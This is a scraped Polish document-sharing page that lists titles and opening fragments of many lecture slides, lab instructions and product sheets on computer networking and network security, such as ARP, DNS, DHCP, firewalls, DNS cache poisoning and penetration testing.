Bardziej szczegółowoARP Address Resolution Protocol (RFC 826)
1 ARP Address Resolution Protocol (RFC 826) aby wysyłać dane tak po sieci lokalnej, jak i pomiędzy różnymi sieciami lokalnymi konieczny jest komplet czterech adresów: adres IP nadawcy i odbiorcy oraz adres
Bardziej szczegółowo1. Model klient-serwer
1. 1.1. Model komunikacji w sieci łącze komunikacyjne klient serwer Tradycyjny podziała zadań: Klient strona żądająca dostępu do danej usługi lub zasobu Serwer strona, która świadczy usługę lub udostępnia
Bardziej szczegółowoSieci komputerowe Warstwa transportowa
Sieci komputerowe Warstwa transportowa 2012-05-24 Sieci komputerowe Warstwa transportowa dr inż. Maciej Piechowiak 1 Wprowadzenie umożliwia jednoczesną komunikację poprzez sieć wielu aplikacjom uruchomionym
Bardziej szczegółowoKtórą normę stosuje się dla okablowania strukturalnego w sieciach komputerowych?
Zadanie 1. Rysunek przedstawia topologię A. magistrali. B. pierścienia. C. pełnej siatki. D. rozszerzonej gwiazdy. Zadanie 2. W architekturze sieci lokalnych typu klient serwer A. żaden z komputerów nie
Bardziej szczegółowoT: Instalacja i konfiguracja serwera DNS.
T: Instalacja i konfiguracja serwera DNS. Podczas wykonywania poniższych zadań w zeszycie w sprawozdaniu 1. podaj i wyjaśnij polecenia, które użyjesz, aby: wyjaśnić pojęcia związane z dns, zainstalować
Bardziej szczegółowoObsługa incydentów bezpieczeństwa: część I, z punktu widzenia menadżera. OWASP 2010.03.17. The OWASP Foundation http://www.owasp.
Obsługa incydentów bezpieczeństwa: część I, z punktu widzenia menadżera. Przemysław Skowron OWASP Poland Leader OWASP 2010.03.17 Alior Bank S.A. przemyslaw.skowron@gmail.com Copyright The OWASP Foundation
Bardziej szczegółowoSIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja
SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja Instytut Telekomunikacji Wydział Elektroniki i Technik Informacyjnych Politechnika Warszawska, marzec 2015 Wprowadzenie Ćwiczenie jest wykonywane
Bardziej szczegółowoModuł Ethernetowy. instrukcja obsługi. Spis treści
Moduł Ethernetowy instrukcja obsługi Spis treści 1. Podstawowe informacje...2 2. Konfiguracja modułu...4 3. Podłączenie do sieci RS-485 i LAN/WAN...9 4. Przywracanie ustawień fabrycznych...11 www.el-piast.com
Bardziej szczegółowoProtokoły sieciowe - TCP/IP
Protokoły sieciowe Protokoły sieciowe - TCP/IP TCP/IP TCP/IP (Transmission Control Protocol / Internet Protocol) działa na sprzęcie rożnych producentów może współpracować z rożnymi protokołami warstwy
Bardziej szczegółowoImperva Incapsula. ochrona przed atakami DDoS. Korzyści. Automatyczne przeciwdziałanie nawet największym i najsprytniejszym atakom DDoS
Imperva ochrona przed atakami DDoS SPECYFIKACJA PRODUKTU Automatyczne przeciwdziałanie nawet największym i najsprytniejszym atakom DDoS Korzyści Potężne wsparcie centrów danych rozproszonych po całym świecie
Bardziej szczegółowoDNSSEC. Zbigniew Jasiński
DNSSEC Zbigniew Jasiński Rozwiązywanie nazw Przechowywanie i utrzymywanie danych Przegląd zagrożeń związanych z DNS modyfikacja pliku strefy nieautoryzowana dynamcizne aktualizacja dynamiczne aktualizacje
Bardziej szczegółowoRobaki sieciowe. + systemy IDS/IPS
Robaki sieciowe + systemy IDS/IPS Robak komputerowy (ang. computer worm) samoreplikujący się program komputerowy, podobny do wirusa komputerowego, ale w przeciwieństwie do niego nie potrzebujący nosiciela
Bardziej szczegółowoAdresy IP v.6 IP version 4 IP version 6 byte 0 byte 1 byte 2 byte 3 byte 0 byte 1 byte 2 byte 3
Historia - 1/2 Historia - 2/2 1984.1 RFC 932 - propozycja subnettingu 1985.8 RFC 95 - subnetting 199.1 ostrzeżenia o wyczerpywaniu się przestrzeni adresowej 1991.12 RFC 1287 - kierunki działań 1992.5 RFC
Bardziej szczegółowoSieci komputerowe. Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008. Michał Cieśla
Sieci komputerowe Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008 Michał Cieśla pok. 440a, email: ciesla@if.uj.edu.pl konsultacje: wtorki 10-12 http://users.uj.edu.pl/~ciesla/
Bardziej szczegółowoZarządzanie bezpieczeństwem w sieciach
Zarządzanie bezpieczeństwem w sieciach mgr inż. Rafał Jachowicz, Instytut Informatyki Stosowanej PŁ Instrukcję opracowano na podstawie materiałów mgra inż. Łukasza Jopka Router programowy z firewallem
Bardziej szczegółowoDlaczego? Mało adresów IPv4. Wprowadzenie ulepszeń względem IPv4 NAT CIDR
IPv6 Dlaczego? Mało adresów IPv4 NAT CIDR Wprowadzenie ulepszeń względem IPv4 Większa pula adresów Lepszy routing Autokonfiguracja Bezpieczeństwo Lepsza organizacja nagłówków Przywrócenie end-to-end connectivity
Bardziej szczegółowoZADANIE.09 Syslog, SNMP (Syslog, SNMP) 1,5h
Imię Nazwisko ZADANIE.09 Syslog, SNMP (Syslog, SNMP) 1,5h 1. Zbudować sieć laboratoryjną 2. Czynności wstępne 3. Syslog 4. SNMP 5. Czynności końcowe - 1 - 1. Zbudować sieć laboratoryjną Zadanie Zbudować
Bardziej szczegółowoINSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk
INSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk ul. Rudolfa Weigla 12, 53-114 Wrocław tel. / fax. (4871) 37-09-997, http://www.iitd.pan.wroc.pl NIP: 896-000-56-96;
Bardziej szczegółowoZbieranie podstawowych śladów działalności.
Zwalczanie Laboratorium 4. Zbieranie podstawowych śladów działalności.. Ślady pozostawione na komputerze można podzielić na dwie kategorie: ulotne i nieulotne. Nieulotne to te, które pozostają na komputerze
Bardziej szczegółowopawel.rajba@gmail.com, http://itcourses.eu/ Adresy zasobów Rodzaje zawartości Negocjacja treści Komunikacja Buforowanie HTTP Request/Response Nagłówki Bezstanowość Cookies Narzędzia URL, http://www.ietf.org/rfc/rfc3986.txt
Bardziej szczegółowoAtaki na serwery Domain Name System (DNS Cache Poisoning)
Ataki na serwery Domain Name System (DNS Cache Poisoning) Jacek Gawrych semestr 9 Teleinformatyka i Zarządzanie w Telekomunikacji jgawrych@elka.pw.edu.pl Plan prezentacji Pytania Phishing -> Pharming Phishing
Bardziej szczegółowoNajbardziej popularne metody włamań
Prezentacja: Najbardziej popularne metody włamań Aleksander Grygiel Plan prezentacji Skanery portów Ataki przez przepełnienie bufora Ataki z wykorzystaniem dowiązań w /tmp Ataki odmowy dostępu Skanowanie
Bardziej szczegółowoProtokół DHCP. DHCP Dynamic Host Configuration Protocol
Protokół DHCP Patryk Czarnik Bezpieczeństwo sieci komputerowych MSUI 2010/11 DHCP Dynamic Host Configuration Protocol Zastosowanie Pobranie przez stację w sieci lokalnej danych konfiguracyjnych z serwera
Bardziej szczegółowoSNMP, wersje 1, 2c i 3
SNMP, wersje 1, 2c i 3 SNMP v1 operacje zarządcy: get(oid1, OID2,..., OIDN) odczytanie wartości obiektu o zadanym identyfikatorze dla każdego argumentu getnext (OID1, OID2,..., OIDN) odczytanie identyfikatora
Bardziej szczegółowoArchitektura oraz testowanie systemu DIADEM Firewall Piotr Piotrowski
Architektura oraz testowanie systemu DIADEM Firewall Piotr Piotrowski 1 Plan prezentacji I. Podstawowe informacje o projekcie DIADEM Firewall II. Architektura systemu III. Środowisko testowe IV. Literatura
Bardziej szczegółowoSieci komputerowe. Domain Name System. WIMiIP, AGH w Krakowie. dr inż. Andrzej Opaliński. www.agh.edu.pl
Sieci komputerowe Domain Name System WIMiIP, AGH w Krakowie dr inż. Andrzej Opaliński Wprowadzenie DNS Domain Name Sysytem system nazw domenowych Protokół komunikacyjny Usługa Główne zadanie: Tłumaczenie
Bardziej szczegółowoAkademickie Centrum Informatyki PS. Wydział Informatyki PS
Akademickie Centrum Informatyki PS Wydział Informatyki PS Wydział Informatyki Sieci komputerowe i Telekomunikacyjne Datagram w Intersieci (IP) Krzysztof Bogusławski tel. 449 41 82 kbogu@man.szczecin.pl
Bardziej szczegółowoSnifery wbudowane w Microsoft Windows
Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany
Bardziej szczegółowoGniazda BSD implementacja w C#
BSD implementacja w C# Implementacja w C#: Przestrzeń nazw: System.Net.Sockets Klasa: public class Socket : IDisposable Implementacja w C#: Konstruktor: public Socket( AddressFamily addressfamily, SocketType
Bardziej szczegółowoRPC Remote Procedural Call. Materiały do prezentacji można znaleźć na stronie: http://www.houp.info/rpc
RPC Remote Procedural Call Materiały do prezentacji można znaleźć na stronie: http://www.houp.info/rpc 1 Wprowadzenie Podstawowe założenia RPC: Program uruchamiany na maszynie A może wywołać procedurę
Bardziej szczegółowoProtokół DHCP. Patryk Czarnik. Bezpieczeństwo sieci komputerowych MSUI 2010/11. Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski
Protokół DHCP Patryk Czarnik Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski Bezpieczeństwo sieci komputerowych MSUI 2010/11 Patryk Czarnik (MIMUW) 10 DHCP BSK 2010/11 1 / 18 DHCP ogólnie
Bardziej szczegółowoStacja czołowa COMPACT - panel OH 51
v Instrukcja Obsługi Stacja czołowa COMPACT - panel OH 51 - jednostka kontroli zdalnej jako dodatkowy panel - zdalna kontrola do dwóch jednostek podstawowych OH50 - połączenie przez Ethernet LAN - możliwy
Bardziej szczegółowoUwierzytelnianie HTTP
Technologie Internetu Uwierzytelnianie HTTP Aleksander Denisiuk denisjuk@pja.edu.pl Polsko-Japońska Akademia Technik Komputerowych Wydział Informatyki w Gdańsku ul. Brzegi 55 80-045 Gdańsk Technologie
Bardziej szczegółowoSieci komputerowe. Protokoły warstwy transportowej. Wydział Inżynierii Metali i Informatyki Przemysłowej. dr inż. Andrzej Opaliński. www.agh.edu.
Sieci komputerowe Protokoły warstwy transportowej Wydział Inżynierii Metali i Informatyki Przemysłowej dr inż. Andrzej Opaliński Plan wykładu Wprowadzenie opis warstwy transportowej Protokoły spoza stosu
Bardziej szczegółowoLaboratorium nr 1 Skanowanie sieci i ataki aktywne
Laboratorium nr 1 Skanowanie sieci i ataki aktywne Laboratorium nr 1 jest poświęcone różnym technikom skanowania sieci oraz wybranym atakom aktywnym. W tym celu będziemy używać aplikacji dostępnych w systemie
Bardziej szczegółowoZarządzanie sesją w aplikacjach Internetowych. Kraków, 2008-10-23 Paweł Goleń
Zarządzanie sesją w aplikacjach Internetowych Kraków, 2008-10-23 Paweł Goleń Agenda Po co sesje w aplikacjach internetowych Sposoby przekazywania identyfikatorów Sposoby ochrony Cookie Analiza identyfikatora
Bardziej szczegółowoWykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych
Wykład 2: Budowanie sieci lokalnych 1 Budowanie sieci lokalnych Technologie istotne z punktu widzenia konfiguracji i testowania poprawnego działania sieci lokalnej: Protokół ICMP i narzędzia go wykorzystujące
Bardziej szczegółowoSieci komputerowe Wykład dla studentów Informatyki Stosowanej studia niestacjonarne
Sieci komputerowe Wykład dla studentów Informatyki Stosowanej studia niestacjonarne UJ 2007/2008 Michał Cieśla pok. 440a, email: ciesla@if.uj.edu.pl http://users.uj.edu.pl/~ciesla/ 1 2 Plan wykładu 1.
Bardziej szczegółowoZarządzanie ruchem w sieci IP. Komunikat ICMP. Internet Control Message Protocol DSRG DSRG. DSRG Warstwa sieciowa DSRG. Protokół sterujący
Zarządzanie w sieci Protokół Internet Control Message Protocol Protokół sterujący informacje o błędach np. przeznaczenie nieosiągalne, informacje sterujące np. przekierunkowanie, informacje pomocnicze
Bardziej szczegółowoSerwer DHCP (dhcpd). Linux OpenSuse.
2015 Serwer DHCP (dhcpd). Linux OpenSuse. PIOTR KANIA Spis treści Wstęp.... 2 Instalacja serwera DHCP w OpenSuse.... 2 Porty komunikacyjne.... 2 Uruchomienie, restart, zatrzymanie serwera DHCP... 2 Sprawdzenie
Bardziej szczegółowoSEGMENT TCP CZ. II. Suma kontrolna (ang. Checksum) liczona dla danych jak i nagłówka, weryfikowana po stronie odbiorczej
SEGMENT TCP CZ. I Numer portu źródłowego (ang. Source port), przeznaczenia (ang. Destination port) identyfikują aplikacje wysyłającą odbierającą dane, te dwie wielkości wraz adresami IP źródła i przeznaczenia
Bardziej szczegółowoWarstwa sieciowa. mgr inż. Krzysztof Szałajko
Warstwa sieciowa mgr inż. Krzysztof Szałajko Modele odniesienia 7 Aplikacji 6 Prezentacji 5 Sesji 4 Transportowa 3 Sieciowa 2 Łącza danych 1 Fizyczna Aplikacji Transportowa Internetowa Dostępu do sieci
Bardziej szczegółowoSystemy Firewall. Grzegorz Blinowski. "CC" - Open Computer Systems. Grzegorz.Blinowski@cc.com.pl
Systemy Firewall Grzegorz Blinowski "CC" - Open Computer Systems Grzegorz.Blinowski@cc.com.pl Plan wykładu Zastosowanie systemów Firewall w Intranecie Rodzaje systemów Firewall Główne koncepcje stosowania
Bardziej szczegółowoTesty penetracyjne Przykłady programów
Bezpieczeństwo systemów informatycznych Testy penetracyjne Przykłady programów Zbigniew Suski 1 Rekonesans - przykłady Zbigniew Suski 2 Rekonesans - przykłady Zbigniew Suski 3 Rekonesans - przykłady Zbigniew
Bardziej szczegółowoPlan wykładu. 1. Sieć komputerowa 2. Rodzaje sieci 3. Topologie sieci 4. Karta sieciowa 5. Protokoły używane w sieciach LAN 6.
Plan wykładu 1. Sieć komputerowa 2. Rodzaje sieci 3. Topologie sieci 4. Karta sieciowa 5. Protokoły używane w sieciach LAN 6. Modem analogowy Sieć komputerowa Siecią komputerową nazywa się grupę komputerów
Bardziej szczegółowo